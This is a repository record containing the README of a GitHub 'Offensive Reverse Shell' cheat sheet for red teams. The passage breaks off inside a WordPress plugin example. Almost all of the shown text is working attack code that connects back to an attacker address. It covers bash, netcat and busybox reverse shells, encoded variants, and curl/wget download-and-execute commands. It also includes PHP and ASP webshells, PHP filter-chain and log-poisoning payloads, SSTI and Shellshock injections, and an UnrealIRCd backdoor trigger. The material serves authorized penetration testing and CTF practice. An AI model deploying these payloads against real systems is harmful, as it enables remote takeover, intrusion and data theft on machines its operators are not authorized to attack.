{"id":10789916,"url":"https://github.com/d4t4s3c/OffensiveReverseShellCheatSheet","last_synced_at":"2025-09-15T18:31:16.915Z","repository":{"id":37244965,"uuid":"247482619","full_name":"d4t4s3c/OffensiveReverseShellCheatSheet","owner":"d4t4s3c","description":"Collection of reverse shells for red team operations.","archived":false,"fork":false,"pushed_at":"2024-12-09T07:03:32.000Z","size":10065,"stargazers_count":471,"open_issues_count":0,"forks_count":91,"subscribers_count":8,"default_branch":"master","last_synced_at":"2024-12-31T20:20:41.771Z","etag":null,"topics":["bash","cheat-sheet","cheatsheet","cybersecurity","netcat","oscp","penetration-testing","pentest","pentesting","perl","php","powershell","python","redteam","redteaming","reverse-shell","reverse-shells","ruby","xterm"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/d4t4s3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-03-15T14:29:15.000Z","updated_at":"2024-12-30T22:24:54.000Z","dependencies_parsed_at":"2022-07-11T05:45:56.902Z","dependency_job_id":"d5bd95a4-4617-4b57-a954-bb77bfdab612","html_url":"https://github.com/d4t4s3c/OffensiveReverseShellCheatSheet","commit_stats":null,"previous_names":["d4t4s3c/offensivereverseshellcheatsheet","d4t4s3c/offensive-reverse-shell-cheat-sheet"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d4t4s3c%2FOffensiveReverseShellCheatSheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/d4t4s3c","download_url":"https://codeload.github.com/d4t4s3c/OffensiveReverseShellCheatSheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":233140528,"owners_count":18631025,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","cheat-sheet","cheatsheet","cybersecurity","netcat","oscp","penetration-testing","pentest","pentesting","perl","php","powershell","python","redteam","redteaming","reverse-shell","reverse-shells","ruby","xterm"],"created_at":"2024-06-06T08:05:51.584Z","updated_at":"2025-09-15T18:31:16.895Z","avatar_url":"https://github.com/d4t4s3c.png","language":"PowerShell","funding_links":[],"categories":["cheatsheet"],"sub_categories":[],"readme":"# Offensive Reverse Shell (Cheat Sheet)\n\n![GitHub stars](https://img.shields.io/github/stars/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/d4t4s3c/OffensiveReverseShellCheatSheet?logoColor=green)\u003c/br\u003e\n![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/d4t4s3c/OffensiveReverseShellCheatSheet) ![GitHub contributors](https://img.shields.io/github/contributors/d4t4s3c/OffensiveReverseShellCheatSheet)\n\nWelcome to the `Offensive Reverse Shell (Cheat Sheet)`, a comprehensive repository curated specifically for **Red Team Operations**, **Penetration Testing**, and **Security Research**. This repository contains a variety of **reverse shell** payloads crafted in different languages and configurations to suit diverse scenarios and environments.\n\n\u003e [!WARNING]\n\u003e All content in this repository is intended strictly for educational purposes and authorized security testing in controlled environments only, whether real or CTF.\n\n## Table of Contents\n\n- [Bash](#bash)\n- [Netcat](#netcat)\n  - [Netcat Linux](#netcat-linux)\n  - [Netcat Windows](#netcat-windows)\n- [cURL](#curl)\n- [Wget](#wget)\n- [Node-RED](#node-red)\n- [WebShells](#webshells)\n  - [Exif Data](#exif-data-webshell)\n  - [ASP WebShell](#asp-webshell)\n  - [PHP WebShell](#php-webShell)\n    - [GET](#get)\n    - [POST](#post)\n    - [Chain Filter](#chain-filter)\n    - [Log Poisoning WebShell](#log-poisoning-webshell)\n      - [SSH](#log-poisoning-ssh)\n      - [FTP](#log-poisoning-ftp)\n      - [HTTP](#log-poisoning-http)\n      - [RSYNC](#log-poisoning-rsync)\n- [Server Side Template Injection (SSTI)\u003c/kbd\u003e](#server-side-template-injection)\n- [UnrealIRCd\u003c/kbd\u003e](#unrealircd)\n- [Exif Data\u003c/kbd\u003e](#exif-data-reverse-shell)\n- [Shellshock\u003c/kbd\u003e](#shellshock)\n  - [SSH](#shellshock-ssh)\n  - [HTTP](#shellshock-http)\n    - [HTTP 500 Internal Server Error](#shellshock-http-500-internal-server-error)\n- [CMS](#cms)\n  - [WordPress](#wordpress)\n  - [October](#october)\n  - [Jenkins](#jenkins)\n    - [Windows](#jenkins-windows)\n    - [Linux](#jenkins-linux)\n- [Perl](#perl)\n- [Python](#python)\n- [Python3](#python3)\n- [PHP](#php)\n- [Ruby](#ruby)\n- [Xterm](#xterm)\n- [Ncat](#ncat)\n- [Socat](#socat)\n- [PowerShell](#powershell)\n- [Awk](#awk)\n- [Gawk](#gawk)\n- [Golang](#golang)\n- [Telnet](#telnet)\n- [Java](#java)\n- [Node](#node)\n- [Msfvenom](#msfvenom)\n  - [Web Payloads](#web-payloads)\n    - [PHP](#php-payload)\n    - [WAR (Tomcat)](#war-payload)\n    - [JAR](#jar-payload)\n    - [JSP](#jsp-payload)\n    - [ASPX](#aspx-payload)\n  - [Linux Payloads](#linux-payloads)\n    - [Listener Netcat](#linux-listener-netcat)\n    - [Listener Metasploit Multi Handler](#linux-listener-metasploit-multi-handler)\n  - [Windows Payloads](#windows-payloads)\n    - [Listener Netcat](#windows-listener-netcat)\n    - [Listener Metasploit Multi Handler](#windows-listener-metasploit-multi-handler)\n\n---\n\n# \u003ckbd\u003eBash\u003c/kbd\u003e\n\n\u003ckbd\u003eTCP\u003c/kbd\u003e\n\n\u003ckbd\u003e-i\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n/bin/sh -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n#bash\nbash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n/bin/bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\n```\n\n# \u003ckbd\u003e196\u003c/kbd\u003e\n\n```sh\n#sh\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; /bin/sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n#bash\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; bash \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/192.168.1.2/443; /bin/bash \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\n```\n\n# \u003ckbd\u003eread line\u003c/kbd\u003e\n\n```sh\nexec 5\u003c\u003e/dev/tcp/192.168.1.2/443;cat \u003c\u00265 | while read line; do $line 2\u003e\u00265 \u003e\u00265; done\n```\n\n# \u003ckbd\u003e5\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n/bin/sh -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n#bash\nbash -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n/bin/bash -i 5\u003c\u003e /dev/tcp/192.168.1.2/443 0\u003c\u00265 1\u003e\u00265 2\u003e\u00265\n```\n\n# \u003ckbd\u003e-c\u003c/kbd\u003e\n\n```sh\nbash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\n#basic url encode\nbash -c 'bash -i \u003e%26 /dev/tcp/192.168.1.2/443 0\u003e%261'\n#full url encode\nbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%27\n```\n\u003ckbd\u003eUDP\u003c/kbd\u003e\n\n```sh\n#sh\nsh -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n/bin/sh -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n#bash\nbash -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n/bin/bash -i \u003e\u0026 /dev/udp/192.168.1.2/443 0\u003e\u00261\n```\n\n---\n\n# \u003ckbd\u003eNetcat\u003c/kbd\u003e\n\n# \u003ckbd\u003eNetcat Linux\u003c/kbd\u003e\n\n\u003ckbd\u003e-e\u003c/kbd\u003e\n\n```sh\n#sh\nnc 192.168.1.2 443 -e sh\nnc 192.168.1.2 443 -e /bin/sh\n#bash\nnc 192.168.1.2 443 -e bash\nnc 192.168.1.2 443 -e /bin/bash\n```\n\n\u003ckbd\u003e-c\u003c/kbd\u003e\n\n```sh\n#sh\nnc -c sh 192.168.1.2 443\nnc -c /bin/sh 192.168.1.2 443\n#bash\nnc -c bash 192.168.1.2 443\nnc -c /bin/bash 192.168.1.2 443\n```\n\n\u003ckbd\u003eNO -e -c\u003c/kbd\u003e\n\n```sh\n#1) create FIFO pipe (pipeline)\nmknod /tmp/backpipe p\n#2) reverse shell\n/bin/sh 0\u003c/tmp/backpipe | nc 192.168.1.2 443 1\u003e/tmp/backpipe\n```\n\n# \u003ckbd\u003eBusyBox\u003c/kbd\u003e\n\n```sh\n#sh\nbusybox nc 192.168.1.2 443 -e sh\nbusybox nc 192.168.1.2 443 -e /bin/sh\n#bash\nbusybox nc 192.168.1.2 443 -e bash\nbusybox nc 192.168.1.2 443 -e /bin/bash\n#not space\nbusybox+nc+192.168.1.2+443+-e+sh\nbusybox${IFS}nc${IFS}192.168.1.2${IFS}443${IFS}-e${IFS}sh\n```\n\n\u003ckbd\u003efifo\u003c/kbd\u003e\n\n```sh\n#sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\n#bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\n#url encode\nrm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2Ff\n\n#base64\n#atacker\nbase64 -w 0 \u003c\u003c\u003c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f'\ncm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK\nnc -lvnp 443\n#victim\necho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh\n#or\nhttp://192.168.1.3/cmd.php?cmd=echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh\n```\n\n---\n\n# \u003ckbd\u003eNetcat Windows\u003c/kbd\u003e\n\n```sh\nnc.exe -e cmd 192.168.1.2 443\n#smbserver\ncp $(locate nc.exe) . \u0026\u0026 impacket-smbserver a $(pwd) -smb2support\n\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443\n```\n\n---\n\n---\n\n# \u003ckbd\u003ecURL\u003c/kbd\u003e\n\n```sh\n#atacker\necho \"nc -e /bin/sh 192.168.1.2 443\" \u003e index.html \u0026\u0026 python3 -m http.server 80\nnc -lvnp 443\n#victim\nhttp://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh\n```\n\n---\n\n# \u003ckbd\u003eWget\u003c/kbd\u003e\n\n```csh\n#atacker\necho \"nc -e /bin/sh 192.168.1.2 443\" \u003e index.html \u0026\u0026 python3 -m http.server 80\nnc -lvnp 443\n#victim\nhttp://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh\n```\n\n---\n\n# \u003ckbd\u003eNode-RED\u003c/kbd\u003e\n\n```json\n[{\"id\":\"7235b2e6.4cdb9c\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"d03f1ac0.886c28\",\"type\":\"tcp out\",\"z\":\"7235b2e6.4cdb9c\",\"host\":\"\",\"port\":\"\",\"beserver\":\"reply\",\"base64\":false,\"end\":false,\"name\":\"\",\"x\":786,\"y\":350,\"wires\":[]},{\"id\":\"c14a4b00.271d28\",\"type\":\"tcp in\",\"z\":\"7235b2e6.4cdb9c\",\"name\":\"\",\"server\":\"client\",\"host\":\"192.168.1.2\",\"port\":\"443\",\"datamode\":\"stream\",\"datatype\":\"buffer\",\"newline\":\"\",\"topic\":\"\",\"base64\":false,\"x\":281,\"y\":337,\"wires\":[[\"4750d7cd.3c6e88\"]]},{\"id\":\"4750d7cd.3c6e88\",\"type\":\"exec\",\"z\":\"7235b2e6.4cdb9c\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":517,\"y\":362.5,\"wires\":[[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"],[\"d03f1ac0.886c28\"]]}]\n```\n\n---\n\n# \u003ckbd\u003eWebShells\u003c/kbd\u003e\n\n# \u003ckbd\u003eExif Data WebShell\u003c/kbd\u003e\n\n```sh\nexiftool -Comment='\u003c?php system($_GET['cmd']); ?\u003e' filename.png\nmv filename.png filename.php.png\n```\n\n# \u003ckbd\u003eASP WebShell\u003c/kbd\u003e\n\n```asp\n\u003c%response.write CreateObject(\"WScript.Shell\").Exec(Request.QueryString(\"cmd\")).StdOut.Readall()%\u003e\n```\n\n# \u003ckbd\u003ePHP WebShell\u003c/kbd\u003e\n\n# \u003ckbd\u003eChain Filter\u003c/kbd\u003e\n\n**http://192.168.1.2/file.php?file=\"paste chain filter\"**\n\n```php\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp\u0026cmd=id\n```\n\n# \u003ckbd\u003eGET\u003c/kbd\u003e\n\n```php\n\u003c?=`$_GET[cmd]`?\u003e\n\u003c?php system($_GET['cmd']); ?\u003e\nGIF89a; \u003c?php system($_GET['cmd']); ?\u003e\n\u003c?php passthru($_GET['cmd']); ?\u003e\n\u003c?php echo exec($_GET['cmd']); ?\u003e\n\u003c?php system($_REQUEST['cmd']); ?\u003e\n\u003c?php echo shell_exec($_GET['cmd']); ?\u003e\n\u003cpre\u003e\u003c?php system($_GET['cmd']); ?\u003e\u003c/pre\u003e\n\u003cpre\u003e\u003ch1\u003e\u003c?php system($_GET['cmd']); ?\u003e\u003c/h1\u003e\u003c/pre\u003e\n\u003c?php echo \"\u003cpre\u003e\" . shell_exec($_REQUEST['cmd']) . \"\u003c/pre\u003e\"; ?\u003e\n```\n\n# \u003ckbd\u003ePOST\u003c/kbd\u003e\n\n```php\n\u003c?php system($_POST['cmd']); ?\u003e\n```\n\n---\n\n# \u003ckbd\u003eLog Poisoning WebShell\u003c/kbd\u003e\n\n# \u003ckbd\u003eLog Poisoning SSH\u003c/kbd\u003e\n\n/var/log/auth.log\n\n```php\nssh '\u003c?php system($_GET[\"cmd\"]); ?\u003e'@192.168.1.2\n```\n\nfile.php?file=`/var/log/auth.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eLog Poisoning FTP\u003c/kbd\u003e\n\n/var/log/vsftpd.log\n\n```cmd\nlftp -u '\u003c?php system($_GET[\"cmd\"]); ?\u003e', 192.168.1.2\n```\n\nfile.php?file=`/var/log/vsftpd.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eLog Poisoning HTTP\u003c/kbd\u003e\n\nApache2: `/var/log/apache2/access.log`  \nNginx: `/var/log/nginx/access.log`\n\n```cmd\ncurl -s -H \"User-Agent: \u003c?php system(\\$_GET['cmd']); ?\u003e\" \"http://192.168.1.2\"\n```\n\n```cmd\nUser-Agent: \u003c?php system($_GET['cmd']); ?\u003e\n```\n\nApache2: file.php?file=`/var/log/apache2/access.log\u0026cmd=id`\nNginx: file.php?file=`/var/log/nginx/access.log\u0026cmd=id`\n\n---\n\n\n# \u003ckbd\u003eLog Poisoning RSYNC\u003c/kbd\u003e\n\n/var/log/rsyncd.log\n\n```cmd\nrsync 192.168.1.2::'\u003c?php system($_GET[\"cmd\"]); ?\u003e'\n```\n\nfile.php?file=`/var/log/rsyncd.log\u0026cmd=id`\n\n---\n\n# \u003ckbd\u003eServer Side Template Injection\u003c/kbd\u003e\n\n```python\n{{request.application.__globals__.__builtins__.__import__('os').popen('nc -e /bin/sh 192.168.1.2 443').read()}}\n```\n```python\n{{''.__class__.__mro__[1].__subclasses__()[373](\"bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\",shell=True,stdout=-1).communicate()[0].strip()}}\n```\n```python\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"192.168.1.2\\\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/bash\\\", \\\"-i\\\"]);'\").read().zfill(417)}}{%endif%}{% endfor %}\n```\n```python\n{% import os %}{{os.system('bash -c \"bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261\"')}}\n```\n```python\n%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22%27%29%7D%7D\n```\n\n---\n\n# \u003ckbd\u003eUnrealIRCd\u003c/kbd\u003e\n\n```cmd\nroot@kali:~# echo \"AB;nc -e /bin/sh 192.168.1.2 443\" |nc 192.168.1.3 6697\n```\n\n---\n\n# \u003ckbd\u003eExif Data Reverse Shell\u003c/kbd\u003e\n\n```cmd\nroot@kali:~# exiftool -Comment='\u003c?php system(\"nc -e /bin/bash 192.168.1.2 443\"); ?\u003e' filename.png\nroot@kali:~# mv filename.png filename.php.png\n```\n\n---\n\n# \u003ckbd\u003eShellshock\u003c/kbd\u003e\n\n# \u003ckbd\u003eShellshock SSH\u003c/kbd\u003e\n\n```sh\nssh user@192.168.1.3 '() { :;}; nc 192.168.1.2 443 -e /bin/bash'\nssh user@192.168.1.3 -i id_rsa '() { :;}; nc 192.168.1.2 443 -e /bin/bash'\n```\n\n---\n\n# \u003ckbd\u003eShellshock HTTP\u003c/kbd\u003e\n\n```sh\ncurl -H 'Cookie: () { :;}; /bin/bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261' http://192.168.1.3/cgi-bin/test.sh\n```\n```sh\ncurl -H \"User-Agent: () { :; }; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\n```\n```sh\ncurl -H \"User-Agent: () { :; }; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\n```\n\n---\n\n# \u003ckbd\u003eShellshock HTTP 500 Internal Server Error\u003c/kbd\u003e\n\n```sh\ncurl -H \"User-Agent: () { :; }; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\ncurl -H \"User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.sh\"\ncurl -H \"User-Agent: () { :; }; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\ncurl -H \"User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\" \"http://192.168.1.3/cgi-bin/evil.cgi\"\n```\n\n---\n\n# \u003ckbd\u003eCMS\u003c/kbd\u003e\n\n# \u003ckbd\u003eWordPress\u003c/kbd\u003e\n\n\u003ckbd\u003eCreate Plugin (Reverse Shell)\u003c/kbd\u003e\n\n```cmd\ntouch plugin.php\nnano plugin.php\n```\n\n\u003ckbd\u003eContent\u003c/kbd\u003e\n\n```php\n\u003c?php\n  /**\n  * Plugin Name: WordPress (Reverse Shell)\n  * Plugin URI: https://wordpress.org\n  * Description: (Pwn3d!)\n  * Version: 1.0\n  * Author: d4t4s3c\n  * Author URI: https://github.com/d4t4s3c\n  */\n  exec(\"busybox nc 192.168.1.2 443 -e 